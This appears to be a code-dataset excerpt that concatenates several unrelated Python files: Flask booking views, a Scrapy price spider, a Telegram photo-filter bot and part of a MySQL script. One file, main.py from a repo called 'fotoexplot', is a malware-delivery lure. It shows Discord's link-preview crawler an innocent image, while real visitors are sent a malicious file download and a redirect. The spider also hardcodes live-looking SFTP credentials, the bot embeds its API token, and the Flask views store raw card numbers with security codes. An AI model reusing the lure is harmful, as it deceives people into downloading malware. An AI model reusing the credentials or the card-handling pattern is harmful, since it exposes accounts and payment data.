membership.valueOfEnd_date(length)\n db.session.commit()\n\n flash('Thanks! You have become our membership!')\n return redirect(url_for('handle_card_membership', id=account.id))\n return render_template('pay_membership.html', form=form, membership_type=membership_type)\n\n\n@main.route('/handle_card_membership/', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_membership(id):\n membership = Membership.query.filter_by(account_id=id).first()\n card = CreditCardInfo.query.filter_by(account_id=id).first()\n form = CardForm()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first()\n price = membership_type.id\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n membership.status = \"Paid\"\n db.session.add(membership)\n db.session.commit()\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', membership=membership)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_membership.html', price=price, form=form)\n\n\n@main.route('/configure_facility', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_facility():\n form = ConfigureFacilityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n capacity = form.capacity.data\n name = form.name.data\n url = form.url.data\n description = form.description.data\n\n if operation == \"add\":\n facility = Facility(name=name,\n url=url,\n capacity=capacity,\n description=description)\n db.session.add(facility)\n db.session.commit()\n flash('You have added the facility')\n\n elif operation == \"edit\":\n fac = Facility.query.filter_by(name=name).get()\n fac.capacity = capacity\n fac.url = url\n fac.description = description\n\n db.session.add(fac)\n db.session.commit()\n flash('You have edited the facility')\n\n elif operation == \"delete\":\n fac = Facility.query.filter_by(name=name).get()\n db.session.delete(fac)\n db.session.commit()\n flash('You have deleted the facility')\n\n return render_template('configure_facility.html', form=form)\n\n\n@main.route('/configure_activity', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_activity():\n form = ConfigureActivityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n facility = form.facility.data\n activity = form.activity.data\n price = form.price.data\n\n fac = Facility.query.filter_by(name=facility).get\n if operation == \"add\":\n act = Activity(weekly_income=0,\n weekly_usage=0,\n activity_price=price,\n activity_name=activity,\n facility_id=fac.id\n )\n db.session.add(act)\n db.session.commit()\n flash('You have added the activity')\n\n elif operation == \"edit\":\n act = Activity.query.filter_by(activity_name=activity).get()\n act.activity_price = price,\n act.activity_name = activity\n act.facility_id = fac.id\n\n db.session.add(act)\n db.session.commit()\n flash('You have edited the activity')\n\n elif operation == \"delete\":\n act = Activity.query.filter_by(activity_name=activity).get()\n db.session.delete(act)\n db.session.commit()\n flash('You have deleted the activity')\n\n return render_template('configure_activity.html', form=form)\n\n\n@main.route('/configure_timetable')\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_timetable():\n form = ConfigureTimetableForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n facility = form.facility.data\n\n fac = Facility.query.filter_by(name=facility).get()\n\n for i in range(start_time, end_time):\n timetable = TimeManagement(date=date,\n start_time=i,\n end_time=i + 1,\n facility_id=fac.id)\n db.session.add(timetable)\n db.session.commit()\n\n return render_template('configure_timetable.html', form=form)\n\n\n@main.route('/facilities')\ndef display_facilities():\n facilities = Facility.query.all()\n template = 'admin/facilities.html' if current_user.is_administrator() else 'facilities.html'\n return render_template(template, facilities=facilities)\n\n\n@main.route('/membership-types')\ndef display_membership_types():\n memberships = MembershipType.query.all()\n template = 'admin/membership_types.html' if current_user.is_administrator() else 'membership.html'\n return render_template(template, membership_types=memberships)\n\n\n@main.route('/membership-types//purchase', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef purchase_membership(type):\n membership_type = MembershipType.query.get_or_404(type)\n form = SelectPaymentForm(cards=current_user.cards)\n\n if form.validate_on_submit():\n membership = Membership(membership_type_id=type, user_id=current_user.id)\n db.session.add(membership)\n\n if form.payment_card.data == SelectPaymentForm.NEW_CARD_CHOICE[0]:\n card_form = form.new_payment_card\n new_card = CreditCardInfo(\n holder_name=card_form.cardholder_name.data,\n card_number=card_form.card_number.data,\n expire_month=card_form.expiry_date.expiry_month.data,\n expire_year=card_form.expiry_date.expiry_year.data,\n security_code=card_form.security_code.data,\n user_id=current_user.id\n )\n db.session.add(new_card)\n flash('Card successfully added to your account.')\n\n db.session.commit()\n flash('Thanks! You have successfully purchased a {} membership.'.format(membership_type.name))\n return redirect(url_for('main.index'))\n\n return render_template('pay_membership.html', membership_type=membership_type, form=form)\n\n\n@main.route('/my/bookings')\n@login_required\ndef display_user_bookings():\n return render_template('my_booking.html', bookings=current_user.bookings)\n\n\n@main.route('/my_card/')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_cards(id):\n user = User.query.filter_by(id=id).first()\n cards = CreditCardInfo.query.filter_by(user_id=user.id).all()\n return render_template('my_card.html', cards=cards)\n\n\n@main.route('/my/membership')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_membership():\n membership = Membership.query.filter_by(user_id=current_user.id).first()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first() if membership else None\n return render_template('my_membership.html', membership=membership, membership_type=membership_type)\n\n\n@main.route('/timetable')\ndef timetable_all():\n date = request.args.get('date', default=datetime.today(), type=dt.datetime)\n end_of_day = datetime(\n year=date.year,\n month=date.month,\n day=date.day + 1,\n hour=0,\n minute=0,\n second=0\n )\n activity_instances = ActivityInstance.query \\\n .filter(ActivityInstance.start_time >= date, ActivityInstance.end_time < end_of_day) \\\n .order_by(ActivityInstance.start_time) \\\n .all()\n\n activity_instances_by_facility = {facility.name: [] for facility in Facility.query.all()}\n for instance in activity_instances:\n activity_instances_by_facility[instance.activity.facility.name].append(instance)\n\n return render_template('timetable_all.html', activity_instances=activity_instances_by_facility)\n\n\n@main.route('/facilities//timetable')\ndef timetable_facility(id):\n facility = Facility.query.get_or_404(id)\n activity_instances = reduce(list.__add__, [activity.instances.order_by(ActivityInstance.start_time).all() for activity in facility.activities.all()])\n return render_template('timetable_all.html', activity_instances={facility.name: activity_instances})\n\n\n# @main.route('/timetable_facility/')\n# def timetable_facility(type):\n# if type == 1:\n# facility = \"Swimming pool\"\n# elif type == 2:\n# facility = \"Fitness room\"\n# elif type == 3:\n# facility = \"Squash courts\"\n# else:\n# facility = \"Sports hall\"\n#\n# facility = Facility.query.filter_by(name=facility).all()\n# today = dt.date.today()\n# day2 = today + dt.timedelta(days=1)\n# day3 = today + dt.timedelta(days=2)\n# day4 = today + dt.timedelta(days=3)\n# day5 = today + dt.timedelta(days=4)\n# timetable1 = TimeManagement.query.filter_by(start_time=today).all()\n# timetable2 = TimeManagement.query.filter_by(start_time=day2).all()\n# timetable3 = TimeManagement.query.filter_by(start_time=day3).all()\n# timetable4 = TimeManagement.query.filter_by(start_time=day4).all()\n# timetable5 = TimeManagement.query.filter_by(start_time=day5).all()\n# return render_template('timetable_facility.html', type=type + 1, today=today, day3=day3, day2=day2, day4=day4,\n# day5=day5, facility=facility, timetable1=timetable1, timetable2=timetable2,\n# timetable3=timetable3, timetable4=timetable4, timetable5=timetable5)\n\n\n@main.route('/my/membership/cancel', methods=['GET', 'POST'])\n@login_required\ndef cancel_membership():\n membership = current_user.membership\n if membership is None:\n return redirect(url_for('main.display_membership'))\n timedelta = membership.get_end_date() - dt.datetime.now()\n days_left = timedelta.days\n money_refund = 0.9 * (days_left / membership.membership_type.length) * membership.membership_type.price\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(membership)\n db.session.commit()\n flash('You have cancelled our membership!')\n return redirect(url_for('main.display_membership'))\n return render_template('cancel_membership.html', money_refund=money_refund, days_left=days_left,\n membership=membership, form=form)\n\n\n@main.route('/user/')\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n return render_template('user.html', user=user)\n\n\n@main.route('/search_booking')\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_booking():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.eamil.data\n\n user = User.query.filter_by(email=email).get()\n return redirect(url_for('display_bookings', id=user.id))\n return render_template('search_booking.html', form=form)\n\n\n@main.route('/search_membership')\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_membership():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.eamil.data\n\n user = User.query.filter_by(email=email).get()\n return redirect(url_for('display_membership', id=user.id))\n return render_template('search_membership.html', form=form)\n\n\n@main.route('/view_income')\n@login_required\n@permission_required(Permission.VIEW_BUSINESS)\ndef view_income():\n \"\"\"income_facility1 = 0\n income_facility2 = 0\n income_facility3 = 0\n income_facility4 = 0\n\n today = datetime.date.today()\n day1 = today - datetime.timedelta(days=1)\n day2 = today - datetime.timedelta(days=2)\n day3 = today - datetime.timedelta(days=3)\n day4 = today - datetime.timedelta(days=4)\n day5 = today - datetime.timedelta(days=5)\n day6 = today - datetime.timedelta(days=6)\n\n timetable1 = Time_management.query.filter_by(date=today).all()\n timetable2 = Time_management.query.filter_by(date=day1).all()\n timetable3 = Time_management.query.filter_by(date=day2).all()\n timetable4 = Time_management.query.filter_by(date=day3).all()\n timetable5 = Time_management.query.filter_by(date=day4).all()\n timetable6 = Time_management.query.filter_by(date=day5).all()\n timetable7 = Time_management.query.filter_by(date=day6).all()\n\n for timetable in timetable1:\n if timetable.facility == 1:\n booking = Booking.query.filter_by(id=timetable.booking_id).get()\n income_facility1 += booking.fees\n\"\"\"\n overall_income = 0\n overall_usage = 0\n activities = Activity.query.all()\n for activity in activities:\n overall_income += activity.weekly_income\n overall_usage += activity.weekly_usage\n return render_template('business.html', overall_income=overall_income,\n overall_usage=overall_usage, activities=activities)\n\n\n@admin_required\n@main.route('/users')\ndef display_users():\n return render_template('admin/users.html', users=User.query.all())\n\n\n@admin_required\n@main.route('/users/new', methods=['GET', 'POST'])\ndef add_user():\n form = EditUserForm()\n if form.validate_on_submit():\n user = User(email=form.email.data.lower(),\n username=form.username.data,\n password=form.password.data,\n role_id=form.role.data.id)\n db.session.add(user)\n db.session.commit()\n flash('User successfully added to database.')\n return redirect(url_for('.display_users'))\n return render_template('admin/edit_user.html', form=form)\n\n\n@admin_required\n@main.route('/activity-instances')\ndef display_activity_instances():\n return render_template('admin/activity_instances.html', activity_instances=ActivityInstance.query.all())\n\n\n@admin_required\n@main.route('/activity-instances/new', methods=['GET', 'POST'])\ndef add_activity_instance():\n form = EditActivityInstanceForm()\n if form.validate_on_submit():\n instance = ActivityInstance(\n start_time=form.start_time.data,\n end_time=form.end_time.data,\n activity_id=form.activity_id.data,\n court_id=form.court_id.data\n )\n db.session.add(instance)\n db.session.commit()\n flash('Activity instance successfully added to database.')\n return redirect(url_for('.display_activity_instances'))\n return render_template('admin/edit_activity_instance.html', form=form)\n\n\n@admin_required\n@main.route('/memberships')\ndef display_memberships():\n return render_template('admin/memberships.html', memberships=Membership.query.all())\n\n\n@admin_required\n@main.route('/memberships/new', methods=['GET', 'POST'])\ndef add_membership():\n form = EditMembershipForm()\n if form.validate_on_submit():\n membership = Membership(\n membership_type_id=form.membership_type_id.data,\n user_id=form.user_id.data\n )\n db.session.add(membership)\n db.session.commit()\n flash('Membership successfully added to database.')\n return redirect(url_for('.display_memberships'))\n return render_template('admin/edit_membership.html', form=form)\n\n\n@admin_required\n@main.route('/activities')\ndef display_activities():\n return render_template('admin/activities.html', activities=Activity.query.all())\n\n\n@admin_required\n@main.route('/bookings')\ndef display_bookings():\n return render_template('admin/bookings.html', bookings=Booking.query.all())\n\n\n@main.route('/edit-profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.name = form.name.data\n current_user.location = form.location.data\n current_user.about_me = form.about_me.data\n db.session.add(current_user._get_current_object())\n db.session.commit()\n flash('Your profile has been updated.')\n return redirect(url_for('.user', username=current_user.username))\n form.name.data = current_user.name\n form.location.data = current_user.location\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', form=form)\n\n\n@main.route('/edit-profile/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.name = form.name.data\n user.location = form.location.data\n user.about_me = form.about_me.data\n db.session.add(user)\n db.session.commit()\n flash('The profile has been updated.')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.name.data = user.name\n form.location.data = user.location\n form.about_me.data = user.about_me\n return render_template('edit_profile.html', form=form, user=user)\n\n\n@main.route('/facilities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_facility():\n form = EditFacilityForm()\n if form.validate_on_submit():\n facility = Facility(name=form.name.data,\n capacity=form.capacity.data,\n description=form.description.data)\n db.session.add(facility)\n db.session.commit()\n flash('Facility has been added to Database')\n return redirect(url_for('.display_facilities'))\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n@main.route('/activities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_activity():\n form = EditActivityForm()\n if form.validate_on_submit():\n activity = Activity(activity_staff_id=form.activity_staff_id.data,\n activity_price=form.activity_price.data,\n activity_name=form.activity_name.data,\n facility_id=form.facility_id.data)\n db.session.add(activity)\n db.session.commit()\n flash('Facility has been added to Database')\n return redirect(url_for('.display_activities'))\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n@main.route('/membership-types/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_membership_type():\n form = EditMembershipTypeForm()\n if form.validate_on_submit():\n membership_type = MembershipType(name=form.name.data, length=form.length.data, price=form.price.data)\n db.session.add(membership_type)\n db.session.commit()\n flash('Membership type has been added to database')\n return redirect(url_for('.display_membership_types'))\n return render_template('admin/edit_membership_type.html', form=form)\n\n\n@main.route('/membership-types/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_membership_type(id):\n mtype = MembershipType.query.get_or_404(id)\n form = EditMembershipTypeForm()\n\n if form.validate_on_submit():\n mtype.name = form.name.data\n mtype.length = form.length.data\n mtype.price = form.price.data\n\n db.session.commit()\n flash('Membership type successfully updated!')\n return redirect('/')\n\n form.name.data = mtype.name\n form.length.data = mtype.length\n form.price.data = mtype.price\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each facility to reach id before calling this method\n@main.route('/facilities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_facility(id):\n facility = Facility.query.get_or_404(id)\n form = EditFacilityForm()\n\n if form.validate_on_submit():\n facility.name = form.name.data\n facility.capacity = form.capacity.data\n facility.description = form.description.data\n\n db.session.commit()\n flash('Facility successfully updated!')\n return redirect('/')\n\n form.name.data = facility.name\n form.capacity.data = facility.capacity\n form.description.data = facility.description\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each activity to reach id before calling this method\n@main.route('/activities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_activity(id):\n activity = Activity.query.get_or_404(id)\n form = EditActivityForm()\n\n if form.validate_on_submit():\n activity.activity_name = form.activity_name.data\n activity.activity_staff_id = form.activity_staff_id.data\n activity.activity_price = form.activity_price.data\n activity.facility_id = form.facility_id.data\n\n db.session.commit()\n flash('Activity successfully updated!')\n return redirect(url_for('.display_activities'))\n\n form.activity_name.data = activity.activity_name\n form.activity_staff_id.data = activity.activity_staff_id\n form.activity_price.data = activity.activity_price\n form.facility_id.data = activity.facility_id\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n# Display method to display the list of activities to get to the edit function\n@main.route('/activities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_activity(id):\n activities = db.session.query(Activity).all()\n\n if not activities:\n flash('No results found!')\n return redirect('/')\n else:\n table = ActivityTable(activities)\n table.border = True\n return render_template('admin/display_activity.html', table=table)\n\n\n@main.route('/facilities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_facility(id):\n facilities = db.session.query(Facility).all()\n\n if not facilities:\n flash('No results found!')\n return redirect('/')\n else:\n table = FacilityTable(facilities)\n table.border = True\n return render_template('admin/display_facility.html', table=table)\n","repo_name":"HollowMan6/Answers-for-My-Leeds-COMP2-Courses","sub_path":"COMP2913/Master/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":33202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25062752113","text":"import requests, io\nfrom flask import Flask, request, send_file\napp = Flask(\n__name__,\n template_folder='templates',\n static_folder='static'\n)\n@app.route('/', methods=['GET'])\ndef main():\n Image = 'https://e7.pngegg.com/pngimages/193/384/png-clipart-panda-panda.png' # Replace this with your image link\n Malicious = 'MaliciousFIleDownloadLink'# Replace this with your download link\n Redirect = \"RedirectLink\" # You can just put the image here or you can put a custom site. You can combine this with my clipboard logger and it'll be more op lol https://github.com/TheonlyIcebear/Clipboard-Javascript-Logger\n # This is to get the ip\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n ip = request.environ['REMOTE_ADDR']\n else:\n ip = request.environ['HTTP_X_FORWARDED_FOR']\n print(ip)\n if ip.startswith('35.') or ip.startswith('34.'):\n # If discord is getting a link preview send a image\n return send_file(\n io.BytesIO(requests.get(Image).content),\n mimetype='image/jpeg',\n download_name='AnyName.png')\n else:\n # If a real person is clicking the link send a malicious file and redirect back to the image\n return f'''\n '''+'''\n ''' # If the file doesn't download change the 500 to a higher number like 1000\nif __name__ == '__main__':\n # Run the Flask app\n app.run(\n host='0.0.0.0',\n debug=True,\n port=8080\n )\n","repo_name":"MematiBaskann/fotoexplot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20538059317","text":"\"\"\"\nOriginal ticket: https://www.assembla.com/spaces/competitormonitor/tickets/3926-express-gifts---spider-copy---dunelm#/activity/ticket:\nThis spider was copied from the Lakeland account\nThis spider downloads the csv file and extracts the products from the URLs.\nThe identifier/SKU is set from the CSV file.\n\"\"\"\nimport csv\nimport json\nimport re\nfrom tempfile import NamedTemporaryFile\nimport os\n\nimport paramiko\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.response import get_base_url\nfrom urlparse import urljoin\n\nfrom product_spiders.items import Product, ProductLoaderWithoutSpaces as ProductLoader\nfrom product_spiders.config import CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass DunelmSpider(BaseSpider):\n name = 'expressgifts-dunelm.com'\n allowed_domains = ['dunelm.com']\n start_urls = ['http://www.dunelm.com']\n\n def parse(self, response):\n transport = paramiko.Transport((CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT))\n username = \"expressgifts\"\n password = \"jqh3aMrK\"\n transport.connect(username = username, password = password)\n sftp = paramiko.SFTPClient.from_transport(transport)\n files = sftp.listdir_attr()\n \n f = NamedTemporaryFile(delete=True, suffix='.csv', prefix='expressgifts_dunelm_')\n sftp.get('express_gifts_flat_file.csv', f.name)\n\n with open(f.name) as csv_f:\n rows = csv.DictReader(csv_f)\n for row in rows:\n if row.get('DUNELM').strip():\n yield Request(row['DUNELM'].strip(), callback=self.parse_product,\n meta={'sku': row['PRODUCT_NUMBER']})\n\n f.close()\n \n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n \n loader = ProductLoader(selector=hxs, item=Product())\n loader.add_value('url', response.url)\n loader.add_xpath('brand', './/dt[text()=\"Brand\"]/following-sibling::dd[1]/text()')\n categories = hxs.select('.//div[contains(@class, \"breadcrumbs\")]//a/text()').extract()\n for category in categories:\n if 'search' in category.lower():\n continue\n loader.add_value('category', category)\n loader.add_value('sku', response.meta.get('sku', ''))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n if hxs.select('//article[@id=\"product\"]'):\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.replace_value('image_url', urljoin(base_url, image_url[0]))\n options = hxs.select('//script[@type=\"text/javascript\"]/text()[contains(., \"productData\")]').extract()\n for item in self.parse_options(hxs, base_url, loader, options):\n yield item\n \n for product in hxs.select('//article[@class=\"bdp-item\"]'):\n image_url = product.select('.//a[contains(@id, \"mainImage\")]/img/@src').extract()[0]\n loader.replace_value('image_url', urljoin(base_url, image_url))\n options = product.select('./div/div[1]//script[@type=\"text/javascript\"]/text()').extract()\n for item in self.parse_options(product, base_url, loader, options):\n yield item\n \n def parse_one_product(self, hxs, base_url, loader):\n if options:\n self.log('Options detected on %s' %loader.get_collected_values('url'))\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.add_value('image_url', urljoin(base_url, image_url[0]))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n loader.add_xpath('identifier', './/article[@id=\"product\"]/@data-product-id')\n loader.add_xpath('sku', './/article[@id=\"product\"]/@data-product-id')\n \n if not hxs.select('.//div[contains(@id, \"stock\")]//text()[contains(.,\"in-stock\")]') and hxs.select('//span[contains(@id, \"standardIcon\")]/@class[.=\"icon availability unavailable\"]'):\n loader.add_value('stock', 0)\n loader.add_xpath('price', './/strong[@id=\"fromPrice\"]/text()')\n product = loader.load_item()\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n return product\n\n def parse_options(self, hxs, base_url, loader, options):\n regx = re.compile('productData(?!.*productData).*? = ({.+})', re.S)\n options = options[0]\n options = json.loads(re.findall(regx, options)[0])\n # name = loader.get_output_value('name')\n for variant in options['skus']:\n loader.replace_value('identifier', variant['id'])\n # loader.replace_value('sku', variant['id'])\n loader.replace_value('price', variant['price'])\n loader.replace_value('name', variant['name'].replace('"', '\"'))\n # option_name = ''\n for attribute in variant['attributes']:\n # option_name += u'{} '.format(attribute['value'])\n if attribute['name'] == 'Colour':\n colour = attribute['value']\n try:\n loader.replace_value('image_url', urljoin(base_url, options['colour'][colour]))\n except:\n pass\n # option_name = option_name.strip()\n product = Product(loader.load_item())\n # product['name'] += u' {}'.format(option_name)\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n formdata = {'dataType':'json', 'quantity':'1', 'storeId':'10151',\n 'productId':variant['identifier'], 'sku':variant['id']}\n #self.log('Url %s. Formdata %s' %(base_url, formdata))\n yield FormRequest('http://www.dunelm.com/webapp/wcs/stores/servlet/AjaxProductAvailabilityView',\n formdata=formdata,\n meta={'product':product, 'tries':1}, callback=self.parse_stock)\n\n def parse_stock(self, response):\n tries = response.meta['tries']\n try:\n stock = json.loads(response.body)\n self.log('Success with %d tries' %tries)\n except:\n tries+=1\n if tries > 50:\n self.log('Gave up retrying stock status for %s' %response.request.headers['Referer'])\n yield response.meta['product']\n return\n self.log('Trying %d get stock status' %tries)\n yield response.request.replace(dont_filter=True, \n meta={'product':response.meta['product'], 'tries':tries})\n return\n deliveries = ('expressAvailableClass', 'rocsAvailableClass', 'standardAvailableClass')\n product = response.meta['product']\n product['stock'] = 0\n for delivery in deliveries:\n if stock[delivery] == \"available\":\n del product['stock']\n break\n\n yield product\n ","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/express_gifts/dunelm.py","file_name":"dunelm.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20339028729","text":"import telebot\nfrom telebot import types\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom PIL import ImageOps\nimport os\nimport time\n\n\nbot = telebot.TeleBot('6974578088:AAE-qBT6FVPesqpH6WcDTa61TJaXwTyyO_o')\nproject_folder = \"/Users/Fedor/PycharmProjects/2kurs\"\n\nglobal ind\nind = 0\n\n\ndef delete_jpg_files(folder_path):\n try:\n files = os.listdir(folder_path)\n\n jpg_files = [file for file in files if file.endswith(\".jpg\")]\n\n for jpg_file in jpg_files:\n file_path = os.path.join(folder_path, jpg_file)\n os.remove(file_path)\n print(f\"Удален файл: {file_path}\")\n\n except Exception as e:\n print(f\"Произошла ошибка при удалении файлов: {e}\")\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn1 = types.KeyboardButton(text='/start')\n btn2 = types.KeyboardButton(text='/help')\n keyboard.add(btn1, btn2)\n bot.send_message(message.chat.id, text='выберите функцию', reply_markup=keyboard)\n\n\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n k_b = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn3 = types.KeyboardButton(text='/reverse_photo')\n btn4 = types.KeyboardButton(text='/blur_photo')\n btn5 = types.KeyboardButton(text='/negative_photo')\n k_b.add(btn3)\n k_b.add(btn4)\n k_b.add(btn5)\n bot.send_message(message.chat.id, text='Выберите обработку', reply_markup=k_b)\n\n\n@bot.message_handler(commands=['reverse_photo'])\ndef reverse(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, r_photo)\n\n\ndef r_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n@bot.message_handler(commands=['blur_photo'])\ndef blur(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, b_photo)\n\n\ndef b_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n for i in range(100):\n im = im.filter(ImageFilter.BLUR)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n\n\n\n@bot.message_handler(commands=['negative_photo'])\ndef negative(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, n_photo)\n\n\ndef n_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n im = ImageOps.invert(im)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\nbot.polling(none_stop=True, interval=0)\n","repo_name":"ZdobnyakovGT/Zdobnyakov_Labs_IU5-34B","sub_path":"HW.py","file_name":"HW.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35720588608","text":"#!/usr/bin/env python3\nimport MySQLdb as mysql\nimport json\nimport os\nimport sys\nfrom statistics import pstdev, stdev \n\ndb_config = json.loads(sys.argv[1])\nstart_date = sys.argv[2]\n\nmysql_connection = mysql.connect(database=db_config['database'], user=db_config['username'], password=db_config['password'])\ncursor = mysql_connection.cursor()\n\ndef get_sit_times():\n cursor.execute(\"\"\"select bookings.id, bookings.car_id, booking_details.type, booking_details.longitude,\n booking_details.latitude, booking_details.created_at, bookings.user_id from bookings\n join booking_details on bookings.id = booking_details.booking_id \n where date(bookings.created_at) > date(\"{}\") \n and hour(bookings.created_at) between 7 + 7 and 20 + 7 \n order by car_id desc, bookings.created_at asc\n ;\"\"\".format(start_date))\n\n line = cursor.fetchone()\n\n i = 1\n end_time = 0\n sit_time = []\n mult = 200.0\n \n while line:\n if i == 1:\n i+=1\n line = cursor.fetchone()\n else:\n carId = line[1]\n while line and line[1] == carId:\n if line[2] == 'end':\n end_time = line[5]\n long_end = round(line[3] * mult) / mult\n lat_end = round(line[4] * mult) / mult\n else:\n start_time = line[5]\n try:\n time_between = start_time - end_time\n time_between = 0\n \n long_start= round(line[3] * mult) / mult\n lat_start = round(line[4] * mult) / mult\n if long_start == long_end and lat_start == lat_end:\n sit_time += [(round(line[4]*2 * mult)/(2 * mult), round(line[3]*2 * mult)/(2 * mult), time_between.seconds, line[0], line[6])]\n except:\n pass\n i += 1\n line = cursor.fetchone()\n\n line = cursor.fetchone()\n averages = {}\n for i in sit_time:\n points = (round(i[0]*2 * mult)/(2 * mult) , round(i[1]*2 * mult)/(2 * mult))\n seconds = i[2]\n if points in averages:\n averages[points] += [seconds]\n else:\n averages[points] = [seconds]\n \n for i in averages.keys():\n av = sum(averages[i])/len(averages[i])\n averages[i] = [av, len(averages[i])]\n \n \n real_sit_time= []\n for i in averages.keys():\n long = i[0]\n lat = i[1]\n time = averages[i][0]\n 